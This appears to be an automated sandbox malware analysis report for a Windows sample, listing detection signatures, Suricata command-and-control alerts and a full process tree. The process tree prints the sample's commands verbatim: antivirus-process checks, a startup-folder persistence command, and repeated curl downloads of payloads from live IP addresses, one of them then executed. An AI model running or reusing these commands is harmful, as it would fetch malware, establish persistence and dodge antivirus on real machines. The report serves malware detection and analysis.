Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- file.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C938C02A19091A3ACD044001631692C8)
- cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 1472 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 5548 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- tasklist.exe (PID: 6476 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 1372 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- cmd.exe (PID: 2636 cmdline: cmd /c md 768032 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 3576 cmdline: cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- Finish.com (PID: 5544 cmdline: Finish.com G MD5: 62D09F076E6E0240548C2F837536A46A)
- cmd.exe (PID: 6004 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 6176 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
- cmd.exe (PID: 3304 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5524 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6784 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2680 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7056 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 4952 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5492 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3712 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 5632 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6948 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 5476 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3580 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 4428 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 5620 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 6252 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7128 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- azvw.exe (PID: 2380 cmdline: azvw.exe -o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68)
- cmd.exe (PID: 2296 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3996 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1288 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 4524 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- systeminfo.exe (PID: 5808 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
- WmiPrvSE.exe (PID: 5700 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
- Conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- findstr.exe (PID: 2884 cmdline: findstr /C:"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- cmd.exe (PID: 5500 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3224 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 1496 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 3040 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 4276 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 768 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6604 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6976 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 4760 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6160 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 2516 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 5560 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- RevenueDevices.exe (PID: 4012 cmdline: "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" MD5: B487B5B51436B42576D60A1FE58F8399)
- cmd.exe (PID: 1336 cmdline: "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4292 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3772 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 1380 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 3876 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3380 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6064 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- choice.exe (PID: 5540 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 1848 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- Conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- InnoSphere.scr (PID: 2676 cmdline: "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l" MD5: 62D09F076E6E0240548C2F837536A46A)
- cleanup
No configs have been found
No yara matches
Spreading |
---|
Source: | Author: Joe Security |
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113 |
Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: frack113 |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger |
Source: | Author: Michael Haag |
Data Obfuscation |
---|
Source: | Author: Joe Security |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-24T12:05:21.959147+0100 | 2853767 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49864 | 178.215.224.74 | 80 | TCP |
2024-11-24T12:05:21.959147+0100 | 2853768 | 1 | A Network Trojan was detected | 192.168.2.5 | 49864 | 178.215.224.74 | 80 | TCP |
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_00406301 | |
Source: | Code function: | 0_2_00406CC7 | |
Source: | Code function: | 52_2_0041C29C | |
Source: | Code function: | 52_2_004107A0 | |
Source: | Code function: | 88_2_004062D5 | |
Source: | Code function: | 88_2_00402E18 | |
Source: | Code function: | 88_2_00406C9B |
Source: | File opened: |
Networking |
---|
Source: | Suricata IDS: |
Source: | Suricata IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |